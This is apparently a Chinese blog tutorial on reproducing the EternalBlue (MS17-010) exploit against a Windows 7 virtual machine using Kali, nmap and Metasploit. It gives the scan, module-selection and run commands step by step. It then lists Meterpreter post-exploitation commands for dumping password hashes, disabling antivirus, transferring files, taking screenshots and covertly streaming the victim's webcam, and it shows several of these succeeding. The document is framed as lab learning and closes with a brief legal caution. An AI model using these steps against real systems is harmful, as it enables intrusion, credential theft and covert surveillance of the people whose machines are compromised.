永恒之蓝复现以及简单的后渗透信息收集
环境准备
首先需要准备两台虚拟机,一台运行kali linux,一台运行windows7,windows其他版本的没有测试,不过非常有可能其他版本已经修复这个bug了,用来学习测试的话,用windows7比较妥善。
网络准备
必须保证windows7和kali linux 在同一个局域网底下,即保证这两台机器IP都是同一个网段的地址。
攻击开始
- 使用kali的nmap工具进行扫描,查看同一个网络下,有哪些主机。运行下面这个命令。
1 | # nmap -T4 -A -v -Pn 192.168.20.1/24 |
可以看到有一个192.168.20.129的主机可用,开启了445端口。我们就对这个主机进行攻击。
- windows验证一下,发现windows获取的IP确实是192.168.20.129
- 在kali上使用工具开始攻击,运行以下命令,稍作等待。
1 | # msfconsole -q |
-q 选项不再继续打印工具启动时的图形文字
运行之后是这样的效果
- 执行以下命令,搜索可以利用的漏洞工具
1 | msf6 > search ms17-010 |
- 选择序号为0的漏洞进行攻击,分别执行以下代码
1 | msf6 > use 0 |
set lhost 是设置攻击主机的IP,set rhost 是设置靶机主机的IP,run开始进行攻击。
效果图如下:
- 稍等片刻,攻击成功后,命令行的提示文字会变为**meterpreter>**,入侵完成,我们可以用命令进行对windows主机的任何操作。
命令 | 功能 |
---|---|
shell | 启动靶机主机的cmd |
screenshot | 对靶机进行屏幕截图 |
webcam_list | 列出摄像头 |
webcam_snap | 利用靶机摄像头拍照 |
webcam_stream | 利用靶机摄像头拍视频 |
getuid | 获取登录用户 |
getsystem | 获取磁盘信息 |
hashdump | 获取密码的哈希值 |
kill | 杀掉进程 |
download | 下载文件 |
upload | 上传文件 |
run killav | 关闭杀软 |
run post/windows/manage/killava | 关闭杀软 |
run post/windows/gather/checkkvm | 检查是否是虚拟机 |
run post/windows/gather/enum_services | 列出所有的服务 |
run post/windows/gather/enum_applications | 列出运行的程序 |
run post/windows/gather/enum_patches | 列出打的补丁 |
run post/windows/gather/dumplinks | 列出最近的操作 |
- 以下是利用上述命令实现的一些效果图
- 使用shell
1 | meterpreter > shell |
运行之后成功进入shell,但是会出现部分乱码,接着输入命令
chcp 65001
,回车后乱码变正常。
- 屏幕截图,运行以下命令
1 | meterpreter > screenshot |
运行成功后桌面上会多了一张windows的屏幕截图
- 上传文件
上传这一张照片
执行以下命令
1 | meterpreter > upload /home/kali/Desktop/shuaige.png c:\\shuaige.png |
显示上传成功,然后去windows主机验证。
上传成功,windows正常查看。
- 调用网络摄像头,运行以下命令
1 | meterpreter > webcam_stream |
kali 成功调用到了windows7的摄像头
写在后面的话
网络并不是法外之地,且行且珍惜。